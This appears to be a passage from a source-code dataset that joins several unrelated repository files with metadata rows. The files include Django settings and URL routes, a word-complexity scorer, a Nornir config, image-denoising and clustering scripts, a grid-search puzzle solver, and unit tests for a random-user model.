ALLOWED_HOSTS = ['127.0.0.1']
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # Project apps.
    'learning_logs',
    'users',
    # Third-party: django-bootstrap3 form/widget rendering.
    'bootstrap3',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'learning_log.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        # Project-level template directory, in addition to per-app templates.
        'DIRS': [os.path.join(BASE_DIR, 'learning_log/templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'learning_log.wsgi.application'
# Database (SQLite for local development; replaced by Postgres on Heroku
# in the branch below).
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization (Brazilian Portuguese locale, Tocantins time zone).
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'pt-br'
TIME_ZONE = 'America/Araguaina'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
# Project-specific settings
LOGIN_URL = '/users/login/'
# Settings for django-bootstrap3
BOOTSTRAP3 = {
    'include_jquery': True
}
# Heroku settings: Heroku runs the app from /app, so this branch only
# activates there.
if os.getcwd() == '/app':
    import dj_database_url
    DATABASES = {
        'default': dj_database_url.config(default='postgres://localhost')
    }
    # Honor the 'X-Forwarded-Proto' header for request.is_secure()
    SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
    # Only serve the Heroku hostname
    ALLOWED_HOSTS = ['learning-log-to.herokuapp.com']
    DEBUG = False
    # Static asset configuration.
    # NOTE(review): BASE_DIR is redefined here to this module's directory,
    # one level deeper than the BASE_DIR defined above — confirm intended.
    BASE_DIR = os.path.dirname(os.path.abspath(__file__))
    STATIC_ROOT = 'staticfiles'
    STATICFILES_DIRS = (
        os.path.join(BASE_DIR, 'static'),
    )
"apracapinheiro@yahoo.com.br"
] | apracapinheiro@yahoo.com.br |
56b63747d8a1ab8c9763ce1c45c7f478922a8631 | dad2ceba093e8b298e01094f06441713e92c60c3 | /complex_word.py | 042c6b13780c2db27a2e871337a4e71cbe47a202 | [] | no_license | siangooding/lexical_simplification | c8376c10e9c0c31b53fe4a743c988ca7ae00c12a | b9193031f0768ad94cbe5b095e067532297f481b | refs/heads/master | 2023-05-28T14:17:27.726239 | 2022-08-03T15:29:43 | 2022-08-03T15:29:43 | 204,720,763 | 14 | 5 | null | 2023-05-22T21:14:20 | 2019-08-27T14:26:18 | Python | UTF-8 | Python | false | false | 2,118 | py |
import labeler
import experiment
import collections
import statistics
import pandas as pd
# Load the pretrained sequence-labelling model once at import time; all
# functions below share it.
model_path = './gpu_attention.model'
model = labeler.SequenceLabeler.load(model_path)
config = model.config
# NOTE(review): declared but never written to in this module.
predictions_cache = {}
# Invert the model's label->id mapping so ids can be translated back to
# label strings.
id2label = collections.OrderedDict()
for label in model.label2id:
    id2label[model.label2id[label]] = label
def get_complex_words(tokenised_string):
    """Return per-token complexity probabilities for *tokenised_string*.

    Writes the tokens to ./complex_word.txt in the two-column format the
    `experiment` module expects, runs the loaded model over it, and returns
    the probability of the 'complex' class for each token.

    NOTE(review): `prob_labels` is taken from `predicted_probs[0]` AFTER the
    batch loop, so only the first sentence of the LAST batch contributes to
    the returned list — fine only if the input always forms a single batch
    with a single sentence; confirm.
    """
    # Dump tokens to disk as '<word>\tN' rows (all provisionally non-complex).
    dataframe = pd.DataFrame()
    dataframe['word'] = tokenised_string
    dataframe['binary'] = 'N'
    dataframe.to_csv('./'+'complex_word'+'.txt', sep = '\t',index=False, header=False, quotechar=' ')
    sentences_test = experiment.read_input_files('./complex_word.txt')
    batches_of_sentence_ids = experiment.create_batches_of_sentence_ids(sentences_test, config["batch_equal_size"], config['max_batch_size'])
    for sentence_ids_in_batch in batches_of_sentence_ids:
        batch = [sentences_test[i] for i in sentence_ids_in_batch]
        cost, predicted_labels, predicted_probs = model.process_batch(batch, is_training=False, learningrate=0.0)
        # Sanity check that the model returned one label list per sentence.
        # NOTE(review): the bare except swallows the AssertionError and only
        # logs; consider failing loudly instead.
        try:
            assert(len(sentence_ids_in_batch) == len(predicted_labels))
        except:
            print('cw error')
    # Probabilities for the first sentence of the last processed batch.
    prob_labels = predicted_probs[0]
    probability_list = []
    for prob_pair in prob_labels:
        # prob_pair[1] is the probability of the positive (complex) class.
        probability_list.append(prob_pair[1])
    return probability_list
def get_complexities(indexes, tokenized_sentence):
    """Mean complexity probability of the tokens at *indexes* within
    *tokenized_sentence*, as scored by get_complex_words."""
    probs = get_complex_words(tokenized_sentence)
    selected = [probs[i] for i in indexes]
    total = float(sum(selected))
    return total / len(selected)
def get_synonym_complexities(synonyms, tokenized, index):
    """Score each candidate synonym in context.

    For every candidate (a list of one or more replacement words), the token
    at *index* in *tokenized* is swapped for the candidate's words and the
    average complexity of the inserted words is computed.

    Returns a list of scores, one per candidate, in input order.
    """
    scores = []
    for candidate in synonyms:
        # Work on a copy so the caller's token list is untouched; drop the
        # original word at the target position.
        sentence = tokenized.copy()
        del sentence[index]
        # Splice in the candidate's words, remembering their positions so a
        # multi-word replacement is scored by its average complexity.
        positions = []
        for offset, token in enumerate(candidate):
            sentence.insert(index + offset, token)
            positions.append(index + offset)
        scores.append(get_complexities(positions, sentence))
    return scores
| [
"siangooding@gmail.com"
] | siangooding@gmail.com |
8d6b1d08cd2bb5f1c6be4d81267ae68fd6dfc6ee | a575970d98fbd27846c15a220444b33a59ce1958 | /api/urls.py | aa41e4b8b693b9ee019fdac973ecf2fe6a4bf314 | [] | no_license | githubbinu/Django-todo-api | 44d4bf2bbe0c439b88141eee53fc3a2c1a610b6c | af8e47a6ad099950639088664b19217941f2c051 | refs/heads/main | 2023-09-01T00:33:13.431632 | 2021-10-08T13:38:16 | 2021-10-08T13:38:16 | 413,303,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 330 | py | from django.urls import path
from . import views
# REST-style routes for the notes API: list, create, and per-note
# retrieve/update/delete keyed by primary key.
urlpatterns=[
    path('',views.getNotes),
    path('notes/',views.getNotes),
    path('notes/create/',views.creatNote),
    path('notes/update/<str:pk>',views.updateNote),
    path('notes/<str:pk>/',views.getNote),
    path('notes/delete/<str:pk>',views.deleteNote),
]
"binuisi2020@gmail.com"
] | binuisi2020@gmail.com |
ed88e447bd54658054b3ff833e6c554baa76ec5f | d48dc8511ff830fb9e0378b7ab5ada1e6d0c48b0 | /env/bin/futurize | e92db88d8b208ef620252944718efb8b67afcf5f | [
"MIT"
] | permissive | MedLemineMbedah/CliniqueEnligne | ad2de52c7e5679d1f34d3291ec713f23c5a811e6 | f0a3aa41159d22741eba6012050c4fdd7580395f | refs/heads/master | 2023-05-05T03:56:42.194170 | 2021-05-28T23:36:51 | 2021-05-28T23:36:51 | 371,837,762 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 257 | #!/home/medlemine/Projet_S2/Cliinique_Enligne/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from libfuturize.main import main
# Console-script entry point generated by setuptools: strip the
# '-script.pyw'/'.exe' wrapper suffix from argv[0], then delegate to
# libfuturize's main().
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"rkaka2766@gmail.com"
] | rkaka2766@gmail.com | |
787216a272c816c71c9e08a086ff040b31419f43 | a193ed2a98f0f53e9a8b68641e4bd9c45c8b1c4d | /flasnir-app/flasnir/nr_config.py | f08aa6afb0e587c4d5653d8ed58796b5a1a8bf94 | [] | no_license | silvanwalz/pythonkurs | c9fbedc784d525d8a0d7112455581c8f0c9d9a66 | ba43c1e3272e06fa81915674cd9d95e5ab969574 | refs/heads/main | 2023-08-16T20:48:05.857996 | 2021-10-05T14:48:39 | 2021-10-05T14:48:39 | 408,350,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 631 | py | from nornir import InitNornir
from nornir.core import Nornir
from flasnir.definitions import PROJECT_ROOT
# Nornir SimpleInventory files, resolved relative to the project root.
HOSTS = PROJECT_ROOT / "config" / "inventory" / "hosts.yaml"
DEFAULTS = PROJECT_ROOT / "config" / "inventory" / "defaults.yaml"
def init_nornir() -> Nornir:
    """Build and return a Nornir instance.

    Uses the threaded runner (100 workers) and a SimpleInventory backed by
    the HOSTS and DEFAULTS files defined above.
    """
    runner_cfg = {
        "plugin": "threaded",
        "options": {"num_workers": 100},
    }
    inventory_cfg = {
        "plugin": "SimpleInventory",
        "options": {
            "host_file": str(HOSTS),
            "defaults_file": str(DEFAULTS),
        },
    }
    return InitNornir(runner=runner_cfg, inventory=inventory_cfg)
"silvan.walz@hotmail.ch"
] | silvan.walz@hotmail.ch |
88487eb18e18b480c92e6a75b3a831acd56fea11 | caeb46f5bde10dc5e7f4624599ed3322a7cbd4a0 | /road_segmentation/predictions_training/post.py | 676806eb52c80a4244307dcbaa1ffc5c8fe0b4ed | [] | no_license | Prolog-ETHZ/cil-new | 2fe1528554deef12ef59b1ea8500e98b899bea60 | a88b99322e72a656119f75e9b1a74777cf6d4dd8 | refs/heads/master | 2020-06-18T09:17:38.412908 | 2017-07-03T21:06:01 | 2017-07-03T21:06:01 | 94,163,874 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,970 | py | import numpy as np
import matplotlib.pyplot as plt
from skimage.restoration import (denoise_tv_chambolle, denoise_bilateral,
denoise_wavelet, estimate_sigma)
from skimage import data, img_as_float, color
from skimage.util import random_noise
import matplotlib.image as mpimg
from PIL import Image
# Side-by-side comparison of scikit-image denoising filters applied to a
# road-segmentation prediction image: TV (two weights), bilateral (two
# strengths), and wavelet denoising (RGB and YCbCr).
name = "./prediction_1.png"
original = img_as_float(mpimg.imread(name))
# NOTE(review): `sigma` is never used below; the image is used as-is
# (`noisy = original`, no noise is added).
sigma = 0.155
noisy = original
fig, ax = plt.subplots(nrows=2, ncols=4, figsize=(8, 5), sharex=True,
                       sharey=True, subplot_kw={'adjustable': 'box-forced'})
plt.gray()
# Estimate the average noise standard deviation across color channels.
sigma_est = estimate_sigma(noisy, multichannel=True, average_sigmas=True)
# Due to clipping in random_noise, the estimate will be a bit smaller than the
# specified sigma.
print("Estimated Gaussian noise standard deviation = {}".format(sigma_est))
# Top row: input plus one setting of each filter.
ax[0, 0].imshow(noisy)
ax[0, 0].axis('off')
ax[0, 0].set_title('Noisy')
ax[0, 1].imshow(denoise_tv_chambolle(noisy, weight=0.1, multichannel=True))
ax[0, 1].axis('off')
ax[0, 1].set_title('TV')
ax[0, 2].imshow(denoise_bilateral(noisy, sigma_color=0.05, sigma_spatial=15,
                multichannel=True))
ax[0, 2].axis('off')
ax[0, 2].set_title('Bilateral')
ax[0, 3].imshow(denoise_wavelet(noisy, multichannel=True))
ax[0, 3].axis('off')
ax[0, 3].set_title('Wavelet denoising')
# Bottom row: stronger settings of each filter, plus the original.
ax[1, 1].imshow(denoise_tv_chambolle(noisy, weight=0.2, multichannel=True))
ax[1, 1].axis('off')
ax[1, 1].set_title('(more) TV')
ax[1, 2].imshow(denoise_bilateral(noisy, sigma_color=0.1, sigma_spatial=15,
                multichannel=True))
ax[1, 2].axis('off')
ax[1, 2].set_title('(more) Bilateral')
ax[1, 3].imshow(denoise_wavelet(noisy, multichannel=True, convert2ycbcr=True))
ax[1, 3].axis('off')
ax[1, 3].set_title('Wavelet denoising\nin YCbCr colorspace')
ax[1, 0].imshow(original)
ax[1, 0].axis('off')
ax[1, 0].set_title('Original')
fig.tight_layout()
plt.show()
"prolog949@gmail.com"
] | prolog949@gmail.com |
4f410a564f81eef398f188eb979ce9c032a2ffb0 | a2c90d183ac66f39401cd8ece5207c492c811158 | /Solving_Problem/daily_222/1205/4991.py | 93e9003c98ad92771f5ba370d3f2e866995051df | [] | no_license | kwoneyng/TIL | 0498cfc4dbebbb1f2c193cb7c9459aab7ebad02a | c6fbaa609b2e805f298b17b1f9504fd12cb63e8a | refs/heads/master | 2020-06-17T11:53:38.685202 | 2020-03-18T01:29:36 | 2020-03-18T01:29:36 | 195,916,103 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,848 | py | from collections import deque
from heapq import heappop, heappush
near = [[-1,0], [0,1], [1,0], [0,-1]]
def val_cha(st,ed):
    """BFS the shortest path on the grid `bd` between cells `ht[st]` and
    `ht[ed]`, avoiding 'x' walls.

    On success, stores the distance symmetrically in the global table
    `dt[st][ed]` / `dt[ed][st]` and returns 0; returns -1 if `ed` is
    unreachable from `st`.
    """
    # Work on a copy of the board so visited cells can be marked as walls.
    temp = [i[:] for i in bd]
    sx,sy = ht[st]
    ex,ey = ht[ed]
    serve = deque()
    serve.append([sx,sy])
    cnt = 0
    # Level-by-level BFS: `cnt` counts expanded levels, so the distance to
    # the target found at level cnt is cnt - 1.
    while serve:
        cnt += 1
        for i in range(len(serve)):
            x,y = serve.popleft()
            if x == ex and y == ey:
                dt[st][ed] = cnt - 1
                dt[ed][st] = cnt - 1
                return 0
            for a,b in near:
                xi,yi = a+x, b+y
                # In-bounds and not a wall / not already visited.
                if 0 <= xi < h and 0 <= yi < w and temp[xi][yi] != 'x':
                    temp[xi][yi] = 'x'
                    serve.append([xi, yi])
    return -1
def build_root(vis, start=0, cnt=0):
    """Try every visiting order of the dirty cells by backtracking.

    `vis[i]` flags dirty cell i as already visited on the current tour,
    `start` is the current position (0 = the robot's start cell), and `cnt`
    is the accumulated distance. The shortest complete tour found is kept
    in the module-level `rs`.
    """
    global rs
    # Every dirty cell visited: record this tour if it beats the best so far.
    if sum(vis) == dirty - 1:
        if cnt < rs:
            rs = cnt
        return 0
    # Extend the tour with each still-unvisited dirty cell.
    for nxt in range(1, dirty):
        if vis[nxt]:
            continue
        vis[nxt] = 1
        build_root(vis, nxt, cnt + dt[start][nxt])
        vis[nxt] = 0
# Main loop: one test case per iteration, terminated by a "0 0" line.
# Grid legend (from the checks below): 'o' robot start, '*' dirty cell,
# 'x' wall, '.' free floor.
while True:
    w,h = map(int,input().split())
    if w == 0 and h == 0:
        break
    bd = [list(input()) for i in range(h)]
    # Index the points of interest: ht[0] is the start, ht[1..] the dirty
    # cells; `dirty` ends up as 1 + number of dirty cells.
    dirty = 1
    rs = 9999999999999999999999
    ht = {}
    for x in range(h):
        for y in range(w):
            if bd[x][y] == 'o':
                ht[0] = [x,y]
            elif bd[x][y] == '*':
                ht[dirty] = [x,y]
                dirty += 1
    # Pairwise-distance table filled by val_cha.
    dt = {}
    for i in range(dirty):
        dt[i] = {}
    # Compute all pairwise distances; if any pair is unreachable the case
    # is impossible and -1 is printed.
    stop_flag = 0
    for i in range(dirty-1):
        if stop_flag == 0:
            for j in range(i+1,dirty):
                if val_cha(i,j) == -1:
                    print(-1)
                    stop_flag = 1
                    break
        else:
            break
    # Otherwise brute-force the best visiting order and print its length.
    if stop_flag == 0:
        vis = [0]*dirty
        build_root(vis)
        print(rs)
| [
"nan308@naver.com"
] | nan308@naver.com |
a5ca80015d31f865b4e42fee95b8868018d1a822 | e06feda0b191c9f6759658948bb13f9dd99ad77e | /tests/test_user.py | 1f1147d73dd5e20b0b2751887c0124f980cfbb74 | [
"MIT"
] | permissive | konstantinfarrell/dbfoo | cfe887caf1d143d69bcad5b2234b614f2e1a1d91 | 69b4da509c71fcbef90e5931f1d68d051c154b57 | refs/heads/master | 2021-01-19T06:50:19.078799 | 2016-07-14T10:59:26 | 2016-07-14T10:59:26 | 61,979,362 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,277 | py | import unittest
from unittest import TestCase
from dbfoo.models import User, DataBase
class TestUser(TestCase):
    """Integration tests for the dbfoo User model and its random-data
    generators.

    NOTE(review): several tests assert that two consecutive random values
    differ (states, phones, cities); those can legitimately collide and
    make the suite flaky.
    """
    def setUp(self):
        """
        Sets up all testing variables that will be used.
        """
        self.dbname = 'dbfootest'
        self.db = DataBase(dbname=self.dbname)
        self.users = User()
        self.session = self.db.Session()
    def test_add_user(self):
        """
        Adds a user and generates data using the "randomize"
        function.
        """
        count = self.session.query(User).count()
        u = User()
        u.randomize()
        self.db.store(u)
        new_count = self.session.query(User).count()
        self.assertEqual(count+1, new_count)
    def test_add_user_from_init(self):
        """
        Adds a user by passing arguments into the User
        class instance.
        """
        count = self.session.query(User).count()
        u = User(first_name='foo', last_name='bar',
                 email='foobar@foobar.net', address='1123 1st st',
                 city='Portland', state='OR', phone='(555) 112-2013')
        self.db.store(u)
        new_count = self.session.query(User).count()
        self.assertEqual(count+1, new_count)
    def test_random_state(self):
        """
        Tests that random states are chosen correctly and that
        two random states are not the same.
        """
        # Data files are read relative to the repository root.
        with open('dbfoo/data/states.txt', 'r') as states:
            states = states.read().splitlines()
        state = self.users.random_state()
        new_state = self.users.random_state()
        self.assertIn(state, states)
        self.assertIn(new_state, states)
        self.assertNotEqual(new_state, state)
    def test_random_phone(self):
        """
        Tests that a random phone number is the correct length
        and that two random phone numbers are unique.
        """
        phone = self.users.random_phone()
        other_phone = self.users.random_phone()
        self.assertEqual(len(phone), 10)
        self.assertNotEqual(phone, other_phone)
    def test_random_city(self):
        """
        Tests that a random city is chosen from the list
        of cities, and that two random cities are unique.
        """
        with open('dbfoo/data/cities.txt', 'r') as cities:
            cities = cities.read().splitlines()
        city = self.users.random_city()
        other_city = self.users.random_city()
        self.assertIn(city, cities)
        self.assertIn(other_city, cities)
        self.assertNotEqual(city, other_city)
    def test_create_email(self):
        """
        Generates a first and last name for a user, then
        tests to ensure the first and last name are contained
        within the generated email address.
        """
        self.users.first_name = self.users.random_first_name()
        self.users.last_name = self.users.random_last_name()
        username = "{}{}".format(self.users.first_name, self.users.last_name)
        email = self.users.create_email(username)
        self.assertIn("{}{}{}".format(self.users.first_name,
                                      self.users.last_name,
                                      '@'), email)
# Allow running this module directly with the stdlib unittest runner.
if __name__ == "__main__":
    unittest.main()
| [
"konstantinfarrell@gmail.com"
] | konstantinfarrell@gmail.com |
e7d27bd42dd7a11e181cfccddc99887e0de43b62 | addeb3229b8da6a8b8b2453d342f7bab99e69a8f | /type_translate.py | c68da35a461efe79d1b7fb1fa1af36745a372596 | [] | no_license | biikashsubedi/Language-Translate | 09bf8d4771abcbccb13d317969aa43661c71de04 | 274024a98df6999c20c369ad8bf1254fd4696bf5 | refs/heads/master | 2022-08-28T19:21:50.604749 | 2020-05-28T20:15:16 | 2020-05-28T20:15:16 | 267,686,206 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | from translate import Translator
import argparse
# CLI argument stubs.
# NOTE(review): the parsed `options` are never used below — the target
# language is hard-coded to "ja". Presumably -ne/-ja/-es were meant to
# select the target language; confirm intended behavior.
args = argparse.ArgumentParser("python3 type_translate.py")
args.add_argument('-ne', '-nepali')
args.add_argument('-ja', '-japanese')
args.add_argument('-es', '-spanish')
options = args.parse_args()
# Read a line of text interactively and print its Japanese translation.
translator= Translator(to_lang="ja")
text = input("Enter To Translate: ")
translation = translator.translate(text)
print(translation)
| [
"noreply@github.com"
] | biikashsubedi.noreply@github.com |
115e5a6a73767a319ba0b7e1fd2b037efc9adb6a | 02482954c417e3d2d0f3cba6af90a936d9abe230 | /clusters.py | aa70e909d647c631e139a501aa2ff1a21bfd87b1 | [] | no_license | HuzeyfeAyaz/Election-Data-Analysis-Tool | c5394d9c5b3aae854f7a8d3c7feb52b06e8e47a5 | 0c1240425ff984c5a60aad9b751f11732ebdb995 | refs/heads/master | 2020-11-25T19:34:52.401570 | 2019-12-18T15:24:07 | 2019-12-18T15:24:07 | 228,814,561 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,529 | py | from PIL import Image,ImageDraw
from sklearn.metrics.pairwise import euclidean_distances
# import numpy as np
def readfile(filename):
    """Parse a tab-separated data matrix from *filename*.

    Expected layout: the first line holds column titles (its first cell is
    ignored); every following row starts with its row name, followed by
    tab-separated float values.

    Returns:
        (rownames, colnames, data) where data is a list of float rows.
    """
    # The original used the Python-2-only `file()` builtin and never closed
    # the handle; `with open(...)` works on both Python 2 and 3 and closes
    # the file deterministically.
    with open(filename) as f:
        lines = [line for line in f]
    # First line is the column titles
    colnames = lines[0].strip().split('\t')[1:]
    rownames = []
    data = []
    for line in lines[1:]:
        p = line.split('\t')
        # First column in each row is the rowname
        rownames.append(p[0])
        # The data for this row is the remainder of the row
        data.append([float(x) for x in p[1:]])
    return rownames, colnames, data
from math import sqrt
def sim_distance(v1, v2):
    """Euclidean-distance-based similarity score in (0, 1]: identical
    vectors score 0, larger distances approach 1."""
    diffs = [(v1[i] - v2[i]) ** 2 for i in range(len(v1))]
    return 1 - 1 / (1 + sqrt(sum(diffs)))
def pearson(v1, v2):
    """1 minus the Pearson correlation of v1 and v2.

    0 means perfectly correlated, 2 means perfectly anti-correlated.
    Returns 0 when the denominator degenerates (e.g. a constant vector).
    """
    n = len(v1)
    # Plain sums and sums of squares.
    sum1, sum2 = sum(v1), sum(v2)
    sum1_sq = sum(v ** 2 for v in v1)
    sum2_sq = sum(v ** 2 for v in v2)
    # Sum of pairwise products.
    prod_sum = sum(v1[i] * v2[i] for i in range(n))
    # Pearson r = num / den.
    num = prod_sum - (sum1 * sum2 / n)
    den = sqrt((sum1_sq - sum1 ** 2 / n) * (sum2_sq - sum2 ** 2 / n))
    if den == 0:
        return 0
    return 1.0 - num / den
class bicluster:
    """Node in a hierarchical-clustering tree.

    Leaves carry a data row in `vec` and a non-negative `id`; merged
    (internal) nodes carry the averaged vector, the two child nodes in
    `left`/`right`, the merge `distance`, and a negative `id`.
    """

    def __init__(self, vec, left=None, right=None, distance=0.0, id=None):
        self.vec = vec
        self.id = id
        self.left = left
        self.right = right
        self.distance = distance
def hcluster(rows,distance=pearson):
    """Agglomerative hierarchical clustering of *rows*.

    Repeatedly merges the closest pair of clusters (per *distance*, default
    Pearson) into a new node whose vector is the element-wise average, until
    one root remains. Returns the root bicluster.
    """
    # Cache of pairwise distances, keyed by (id, id) so results survive
    # across merge iterations.
    distances={}
    # Merged clusters get negative ids, counting down from -1.
    currentclustid=-1
    # Clusters are initially just the rows
    clust=[bicluster(rows[i],id=i) for i in range(len(rows))]
    while len(clust)>1:
        lowestpair=(0,1)
        closest=distance(clust[0].vec,clust[1].vec)
        # loop through every pair looking for the smallest distance
        for i in range(len(clust)):
            for j in range(i+1,len(clust)):
                # distances is the cache of distance calculations
                if (clust[i].id,clust[j].id) not in distances:
                    distances[(clust[i].id,clust[j].id)]=distance(clust[i].vec,clust[j].vec)
                d=distances[(clust[i].id,clust[j].id)]
                if d<closest:
                    closest=d
                    lowestpair=(i,j)
        # calculate the average of the two clusters
        mergevec=[
            (clust[lowestpair[0]].vec[i]+clust[lowestpair[1]].vec[i])/2.0
            for i in range(len(clust[0].vec))]
        # create the new cluster
        newcluster=bicluster(mergevec,left=clust[lowestpair[0]],
                             right=clust[lowestpair[1]],
                             distance=closest,id=currentclustid)
        # cluster ids that weren't in the original set are negative
        currentclustid-=1
        # Remove the merged pair (higher index first so the lower index
        # stays valid) and append the new node.
        del clust[lowestpair[1]]
        del clust[lowestpair[0]]
        clust.append(newcluster)
    return clust[0]
def printclust(clust,labels=None,n=0):
    """Print the cluster tree as an indented text hierarchy.

    Internal (merged) nodes print '-'; leaves print their id, or
    labels[id] when *labels* is given. (Python 2 print statements.)
    """
    # indent to make a hierarchy layout
    for i in range(n): print ' ',
    if clust.id<0:
        # negative id means that this is branch
        print '-'
    else:
        # positive id means that this is an endpoint
        if labels==None: print clust.id
        else: print labels[clust.id]
    # now print the right and left branches
    if clust.left!=None: printclust(clust.left,labels=labels,n=n+1)
    if clust.right!=None: printclust(clust.right,labels=labels,n=n+1)
def getheight(clust):
    """Number of leaves under *clust* — the dendrogram's vertical extent."""
    # A leaf occupies exactly one row.
    if clust.left is None and clust.right is None:
        return 1
    # An internal node spans the rows of both of its children.
    return getheight(clust.left) + getheight(clust.right)
def getdepth(clust):
    """Total merge distance from *clust* down to its deepest leaf."""
    # Leaves contribute no distance of their own.
    if clust.left is None and clust.right is None:
        return 0
    # An internal node adds its own distance to the deeper branch.
    deeper = max(getdepth(clust.left), getdepth(clust.right))
    return deeper + clust.distance
def drawdendrogram(clust,labels,jpeg='clusters.jpg'):
    """Render the cluster tree rooted at *clust* as a dendrogram JPEG.

    Height scales with the number of leaves (20px per leaf); horizontal
    distances are scaled so the deepest branch fits the fixed 1200px width.
    """
    # height and width
    h=getheight(clust)*20
    w=1200
    depth=getdepth(clust)
    # width is fixed, so scale distances accordingly
    scaling=float(w-150)/depth
    # Create a new image with a white background
    img=Image.new('RGB',(w,h),(255,255,255))
    draw=ImageDraw.Draw(img)
    # Stub line from the left edge into the root node.
    draw.line((0,h/2,10,h/2),fill=(255,0,0))
    # Draw the first node
    drawnode(draw,clust,10,(h/2),scaling,labels)
    img.save(jpeg,'JPEG')
def drawnode(draw,clust,x,y,scaling,labels):
    """Recursively draw one node of the dendrogram at (x, y).

    Internal nodes (negative id) draw a vertical connector plus two
    horizontal branches whose length is the merge distance times *scaling*;
    leaves draw their label text.
    """
    if clust.id<0:
        # Vertical space claimed by each child, 20px per leaf.
        h1=getheight(clust.left)*20
        h2=getheight(clust.right)*20
        top=y-(h1+h2)/2
        bottom=y+(h1+h2)/2
        # Line length
        ll=clust.distance*scaling
        # Vertical line from this cluster to children
        draw.line((x,top+h1/2,x,bottom-h2/2),fill=(255,0,0))
        # Horizontal line to left item
        draw.line((x,top+h1/2,x+ll,top+h1/2),fill=(255,0,0))
        # Horizontal line to right item
        draw.line((x,bottom-h2/2,x+ll,bottom-h2/2),fill=(255,0,0))
        # Call the function to draw the left and right nodes
        drawnode(draw,clust.left,x+ll,top+h1/2,scaling,labels)
        drawnode(draw,clust.right,x+ll,bottom-h2/2,scaling,labels)
    else:
        # If this is an endpoint, draw the item label
        draw.text((x+5,y-7),labels[clust.id],(0,0,0))
def rotatematrix(data):
    """Transpose *data* (swap rows and columns) so that columns can be
    clustered with the same routines used for rows."""
    return [[row[col] for row in data] for col in range(len(data[0]))]
import random
def kcluster(rows,distance=pearson,k=4):
    """K-means clustering of *rows* into *k* clusters.

    Centroids start at random positions within each column's observed
    range; iterates at most 100 times or until assignments stop changing.
    Returns a list of k lists of row indices. (Python 2 print statement.)
    """
    # Determine the minimum and maximum values for each point
    ranges=[(min([row[i] for row in rows]),max([row[i] for row in rows]))
            for i in range(len(rows[0]))]
    # Create k randomly placed centroids
    clusters=[[random.random()*(ranges[i][1]-ranges[i][0])+ranges[i][0]
               for i in range(len(rows[0]))] for j in range(k)]
    lastmatches=None
    for t in range(100):
        print 'Iteration %d' % t
        bestmatches=[[] for i in range(k)]
        # Find which centroid is the closest for each row
        for j in range(len(rows)):
            row=rows[j]
            bestmatch=0
            for i in range(k):
                d=distance(clusters[i],row)
                if d<distance(clusters[bestmatch],row): bestmatch=i
            bestmatches[bestmatch].append(j)
        # If the results are the same as last time, this is complete
        if bestmatches==lastmatches: break
        lastmatches=bestmatches
        # Move the centroids to the average of their members
        # (empty clusters keep their previous position).
        for i in range(k):
            avgs=[0.0]*len(rows[0])
            if len(bestmatches[i])>0:
                for rowid in bestmatches[i]:
                    for m in range(len(rows[rowid])):
                        avgs[m]+=rows[rowid][m]
                for j in range(len(avgs)):
                    avgs[j]/=len(bestmatches[i])
                clusters[i]=avgs
    return bestmatches
def tanimoto(v1, v2):
    """Tanimoto distance between two vectors treated as presence sets:
    1 minus the ratio of positions nonzero in both to positions nonzero
    in either. 0 means identical supports, 1 means disjoint."""
    in_first = 0
    in_second = 0
    in_both = 0
    for a, b in zip(v1, v2):
        if a != 0:
            in_first += 1
        if b != 0:
            in_second += 1
        if a != 0 and b != 0:
            in_both += 1
    return 1.0 - (float(in_both) / (in_first + in_second - in_both))
def scaledown(data,distance=pearson,rate=0.01):
    """Multidimensional scaling: project *data* into 2D so that pairwise
    2D distances approximate the pairwise *distance* values.

    Runs gradient descent for at most 1000 iterations, stopping early when
    total error increases. Returns a list of [x, y] locations, one per row.
    (Python 2 print statement.)
    """
    n=len(data)
    # The real distances between every pair of items
    realdist=[[distance(data[i],data[j]) for j in range(n)]
              for i in range(0,n)]
    # Randomly initialize the starting points of the locations in 2D
    loc=[[random.random(),random.random()] for i in range(n)]
    fakedist=[[0.0 for j in range(n)] for i in range(n)]
    lasterror=None
    for m in range(0,1000):
        # Find projected distances
        for i in range(n):
            for j in range(n):
